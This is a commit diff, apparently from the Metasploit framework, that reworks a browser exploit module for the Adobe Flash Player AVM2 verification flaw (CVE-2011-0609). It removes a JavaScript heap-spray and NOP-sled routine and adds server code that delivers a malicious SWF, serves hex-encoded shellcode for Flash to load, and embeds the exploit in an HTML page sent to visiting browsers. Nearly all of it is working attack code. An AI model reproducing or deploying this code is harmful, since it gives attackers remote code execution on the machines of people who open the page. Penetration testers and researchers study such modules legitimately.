Lots of work to make this a lot more reliable =)

git-svn-id: file:///home/svn/framework3/trunk@12146 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/adobe_flashplayer_avm.rb

@@ -18,30 +18,26 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Adobe Flash Player AVM Bytecode Verification',
+			'Name'           => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',
 			'Description'    => %q{
-					This module exploits a vulnerability in AVM2 action script virtual machine used
-				in Adobe Flash Player versions 9.0 through 10. The AVM fails to properly verify 
-				bytecode streams prior to executing it. This can cause uninitialized memory to be 
-				executed.
+					This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33
+				and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
+				logic. This results in unsafe JIT(Just-In-Time) code being executed.
 
-				Utilizing heap spraying techniques to control the uninitialized memory region it is
-				possible to execute arbitrary code. Typically Flash Player is not used as a 
-				standalone application. Often, SWF files are embeded in other file formats or 
-				specifically loaded via a web browser. Malcode was discovered in the wild which 
-				embeded a malformed SWF file within an Excel spreadsheet. This exploit is based
-				off the byte stream found within that malcode sample.
+					Specifically, this issue results in uninitialized memory being referenced and later 
+				executed. Taking advantage of this issue relies on heap spraying and controlling the
+				uninitialized memory.
 				},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'bannedit' # Metasploit version
+					'bannedit', # Metasploit version,
+					'Unknown'   # Malcode version seen used in targeted attacks
 				],
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					['CVE', '2011-0609'],
-					['OSVDB', '71254'],
 					['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],
 					['URL', 'http://www.adobe.com/devnet/swf.html'],
 					['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html']
@@ -62,70 +58,57 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Automatic', { 'Ret' => 0x04040404 }],
+					[ 'Automatic', {}],
 				],
 			'DisclosureDate' => 'Mar 15 2011',
 			'DefaultTarget'  => 0))
 	end
 
-	def load_swfs
+	def exploit
 		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0609.swf" )
 		fd = File.open( path, "rb" )
-		trigger = fd.read(fd.stat.size)
+		@swf = fd.read(fd.stat.size)
 		fd.close
-		return trigger
+		
+		super
 	end
-	
+
 	def on_request_uri(cli, request)
-		trigger = load_swfs
+		trigger = @swf
 		trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
+		shellcode = payload.encoded.unpack('H*')[0]
+		obj_id = rand_text_alpha(rand(6)+3)
 
 		if request.uri.match(/\.swf/i)
-			print_status("Sending Trigger SWF")
+			print_status("Sending Exploit SWF")
 			send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
 			return
 		end
-		
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		nops = [target.ret].pack('V')
-		nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
 
-		var_blocks    = rand_text_alpha(rand(6)+3)
-		var_shellcode = rand_text_alpha(rand(6)+3)
-		var_index     = rand_text_alpha(rand(6)+3)
-		var_nopsled   = rand_text_alpha(rand(6)+3)
-		spray_func    = rand_text_alpha(rand(6)+3)
-		obj_id        = rand_text_alpha(rand(6)+3)
-		
-		# The methods used in this exploit currently could be improved. Heap spraying can likely
-		# be done using ActionScript. I am still investigating this possibility. Additionally,
-		# Hafei Li has been conducting some interesting research in the area of ActionScript 
-		# related vulnerabilities which could be leveraged for this exploit.
-		#
-		# Currently this method only works with IE as Firefox runs Flash in a container process
-		# which is uneffected by JS heap spraying.
+		# we use a nice trick by having Flash request our shellcode and load it for the heap spray
+		# src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as
+		if request.uri.match(/\.txt/i)
+			send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
+			return
+		end
+
 		html =  <<-EOS
 		<html>
 			<head>
 			</head>
 			<body>
-			<script>
-			function #{spray_func}() {
-				#{var_blocks} = new Array();
-				var #{var_shellcode} = unescape("#{shellcode}");
-				var #{var_nopsled} = unescape("#{nop_sled}");
-				do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
-					for (#{var_index}=0; #{var_index} < 25000; #{var_index}++)
-						#{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
-				}
-			#{spray_func}();
-			</script>
-		<center>	
-		
+		<center>
 			<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
-		             id="#{obj_id}" width="0" height="0"
+		             id="#{obj_id}" width="600" height="400"
 		             codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
-		         <param name="movie" value="#{trigger_file}" />
+		         <param name="movie" value="#{get_resource}#{trigger_file}" />
+		         <embed src="#{get_resource}#{trigger_file}" quality="high"
+		             width="320" height="300" name="#{obj_id}" align="middle"
+		             allowNetworking="all"
+		             type="application/x-shockwave-flash"
+		             pluginspage="http://www.macromedia.com/go/getflashplayer">
+		         </embed>
+
 		     </object>
 		</center>
 
@@ -136,4 +119,4 @@ EOS
 		print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
 		send_response(cli, html, { 'Content-Type' => 'text/html' })
 	end
-end
+end